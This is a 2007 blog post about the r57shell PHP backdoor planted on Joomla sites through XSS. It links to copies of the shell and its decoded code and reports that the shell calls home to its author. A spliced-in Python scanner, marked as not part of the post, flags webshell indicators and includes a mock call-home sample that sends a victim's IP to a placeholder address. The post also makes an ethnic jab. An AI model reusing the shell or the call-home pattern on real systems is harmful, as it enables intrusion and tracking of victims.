Friday, June 29, 2007

Joomla, XSS and Obfuscated Code

Hello again,

Yesterday, our chief engineer Ben came across an interesting backdoor PHP script that a friend on IRC was talking about. He was studying the Joomla source prior to implementation, and found that tons of Joomla sites had been owned with an XSS used to load the r57shell PHP script.

We've included a copy of the script here for educational purposes: http://www.projectskyline.com/phplist/r57shell.txt

Ben went and posted this information to the NYPHP list to provide fellow developers an insight into the tools crackers are using against us.

A member of the PHP list pointed out that the script has backdoor, author-alerting features: http://seclists.org/fulldisclosure/2006/Sep/0083.html

Ben decided to base64_decode( ) the obfuscated variables and see what kinds of programs the shell script was building and executing.

The first section of code is the author alert: it sends the author the IP address of the owned machine.

Ben then went ahead and decoded the programs; a link to them is here:
http://www.projectskyline.com/phplist/test.php
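Doing that decoding systematically, as an added example that is not from the post or from r57shell itself: a small Python scanner that pulls every base64_decode() string literal out of a PHP file, decodes it, and flags indicators of the call-home behaviour the post describes (mail() plus REMOTE_ADDR) and of code being built and executed. The sample PHP, the indicator list and the helper names are constructed assumptions for this example.

```python
import base64
import re

# Indicators worth a closer look in decoded webshell strings. This list is an
# assumption for the example, drawn from the post's description of an
# author alert (mail + REMOTE_ADDR) and of programs being built and run.
SUSPICIOUS = ("mail(", "REMOTE_ADDR", "eval(", "system(", "passthru(", "fsockopen(")

# Matches base64_decode("...") or base64_decode('...') with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")

def decode_literals(php_source):
    """Return (encoded, decoded) pairs for every base64_decode() call whose
    argument is a string literal. Blobs that are not valid base64 are skipped."""
    found = []
    for m in B64_CALL.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        found.append((blob, decoded))
    return found

def flag_decoded(php_source):
    """Decode each literal and report which suspicious indicators it contains."""
    report = []
    for blob, decoded in decode_literals(php_source):
        hits = [s for s in SUSPICIOUS if s in decoded]
        report.append({"encoded": blob[:24] + "...", "decoded": decoded, "hits": hits})
    return report

# Constructed sample, encoded here so the example runs offline. It mimics the
# shape the post describes (strings hidden as base64 literals and decoded at
# runtime); the decoded text is invented and is not the r57shell source.
def _b64(text):
    return base64.b64encode(text.encode()).decode()

SAMPLE_PHP = (
    "<?php\n"
    '$alert = base64_decode("' + _b64('mail("author@example.invalid", "new box", $_SERVER["REMOTE_ADDR"]);') + '");\n'
    '$banner = base64_decode("' + _b64("echo 'hello';") + '");\n'
    "eval($alert);\n"
)

if __name__ == "__main__":
    for entry in flag_decoded(SAMPLE_PHP):
        print(entry["hits"] or "clean", "<-", entry["decoded"])
```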

Can't trust those Russians!

- psl


1 Comment:

At November 12, 2008 10:34 AM , Blogger Punisher said...

Hello,

I frequent a forum that is being continuously hacked by this r57 shell script, and I was wondering if you knew how to secure the box that is being hacked to prevent this from happening again. If you do, please shoot me an email amin.kardan@gmail.com

